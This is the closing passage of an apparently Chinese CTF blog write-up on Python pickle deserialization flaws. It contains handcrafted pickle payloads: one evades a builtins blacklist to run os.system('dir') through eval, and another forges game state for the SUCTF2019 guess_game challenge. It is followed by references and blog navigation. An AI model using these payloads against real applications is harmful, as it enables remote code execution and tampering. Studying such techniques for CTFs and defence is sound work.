class="string">"builtins"</span> <span class="keyword">and</span> name <span class="keyword">not</span> <span class="keyword">in</span> blacklist:</span><br><span class="line">         print(module,<span class="string">"   "</span>,name)</span><br><span class="line">         <span class="keyword">return</span> getattr(builtins, name)</span><br></pre></td></tr></table></figure>
<p>结果如下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">b&apos;cbuiltins\ngetattr\n(cbuiltins\ndict\nS\&apos;get\&apos;\ntR(cbuiltins\nglobals\n(tRS\&apos;builtins\&apos;\ntRp1\ncbuiltins\ngetattr\n(g1\nS\&apos;eval\&apos;\ntR(S\&apos;__import__(&quot;os&quot;).system(&quot;dir&quot;)\&apos;\ntR.&apos;</span><br><span class="line">rightbuiltins     getattr</span><br><span class="line">rightbuiltins     dict</span><br><span class="line">rightbuiltins     globals</span><br><span class="line">rightbuiltins     getattr</span><br></pre></td></tr></table></figure>
<p>对比我们的payload与debug的数据，不难发现，检查所限制的仅仅是通过<code>c</code>修饰的语句，这一点从表中也可以看出 </p>
<p>除此之外，我们还可以得到一些我们以后构造payload可能会用到的经验</p>
<p><code>S</code> 、 <code>V</code> ：翻译出来的语句的作用为，1.充当参数   2.模块下的函数引用</p>
<p>看起来和汇编shellcode差不多，熟能生巧，看得多了自然就会了，总之，限制稍微难一点的程序构造的payload都是需要我们进行手搓pickle的，gg</p>
<h5 id="example4"><a href="#example4" class="headerlink" title="example4"></a>example4</h5><p>Suctf2019 guess_game</p>
<p>这个题目我个小菜鸡觉得与前面的不同的是，他在运行代码的时候，目的是为了改变已有的game对象的值，以达到服务器端后续的检查绕过。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">exp = <span class="string">b'''cguess_game</span></span><br><span class="line"><span class="string">game</span></span><br><span class="line"><span class="string">&#125;S"win_count"</span></span><br><span class="line"><span class="string">I10</span></span><br><span class="line"><span class="string">sS"round_count"</span></span><br><span class="line"><span class="string">I9   #重新构造round_count与win_count中的数据</span></span><br><span class="line"><span class="string">sb'''</span><span class="comment">#更新game中的dict数据</span></span><br></pre></td></tr></table></figure>
<p><a href="https://github.com/rmb122/suctf2019_guess_game/tree/master/writeup" target="_blank" rel="noopener">https://github.com/ppcrab/suctf2019_guess_game</a></p>
<p>越到后面越觉得和shellcode 相像，只不过是另外的一个架构罢了。或许，底层的东西都很相似。</p>
<h3 id="参考资料"><a href="#参考资料" class="headerlink" title="参考资料"></a>参考资料</h3><p><a href="https://juejin.im/post/5be4e7b5e51d4535b07d1590" target="_blank" rel="noopener">https://juejin.im/post/5be4e7b5e51d4535b07d1590</a></p>
<p><a href="https://blog.csdn.net/shixiaoguo90/article/details/22433245" target="_blank" rel="noopener">https://blog.csdn.net/shixiaoguo90/article/details/22433245</a></p>
<p><a href="https://www.leavesongs.com/PENETRATION/code-breaking-2018-python-sandbox.html" target="_blank" rel="noopener">https://www.leavesongs.com/PENETRATION/code-breaking-2018-python-sandbox.html</a></p>
<p><a href="https://github.com/rmb122/suctf2019_guess_game/tree/master/writeup" target="_blank" rel="noopener">https://github.com/rmb122/suctf2019_guess_game/tree/master/writeup</a></p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/08/09/以fastbin为基础的leak/" rel="next" title="以fastbin为基础的leak">
                <i class="fa fa-chevron-left"></i> 以fastbin为基础的leak
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/08/21/off-by-one-or-off-by-null/" rel="prev" title="off_by_one or off_by_null">
                off_by_one or off_by_null <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/photo/hello.jpg"
                alt="John Doe" />
            
              <p class="site-author-name" itemprop="name">John Doe</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">38</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                
                  <span class="site-state-item-count">1</span>
                  <span class="site-state-item-name">tags</span>
                
              </div>
            

          </nav>

          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://oj.blue-whale.me" target="_blank" title="Blue_Whaleoj">
                      
                        <i class="fa fa-fw fa-globe"></i>Blue_Whaleoj</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="https://bleachz.github.io/" target="_blank" title="DALAO">
                      
                        <i class="fa fa-fw fa-globe"></i>DALAO</a>
                  </span>
                
            </div>
          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#序列化与反序列化"><span class="nav-number">1.</span> <span class="nav-text">序列化与反序列化</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#序列化"><span class="nav-number">1.1.</span> <span class="nav-text">序列化</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#反序列化"><span class="nav-number">1.2.</span> <span class="nav-text">反序列化</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#python的序列化反序列化模块pickle和json"><span class="nav-number">2.</span> <span class="nav-text">python的序列化反序列化模块pickle和json</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#pickle"><span class="nav-number">2.1.</span> <span class="nav-text">pickle</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#json"><span class="nav-number">2.2.</span> <span class="nav-text">json</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#python反序列化漏洞的原因"><span class="nav-number">3.</span> <span class="nav-text">python反序列化漏洞的原因</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#保护-限制"><span class="nav-number">3.1.</span> <span class="nav-text">保护-限制</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#example1"><span class="nav-number">3.1.1.</span> <span class="nav-text">example1</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#example2"><span class="nav-number">3.1.2.</span> <span class="nav-text">example2</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#example3"><span class="nav-number">3.1.3.</span> <span class="nav-text">example3</span></a><ol class="nav-child"><li class="nav-item nav-level-6"><a class="nav-link" href="#手搓payload-amp-pickle语言的学习"><span class="nav-number">3.1.3.1.</span> <span class="nav-text">手搓payload &amp;pickle语言的学习</span></a></li></ol></li><li class="nav-item nav-level-5"><a class="nav-link" href="#example4"><span class="nav-number">3.1.4.</span> <span class="nav-text">example4</span></a></li></ol></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#参考资料"><span class="nav-number">4.</span> <span class="nav-text">参考资料</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">John Doe</span>

  
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-area-chart"></i>
    </span>
    
      <span class="post-meta-item-text">Site words total count&#58;</span>
    
    <span title="Site words total count">24.7k</span>
  
</div>


  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  




  

  
</body>
</html>
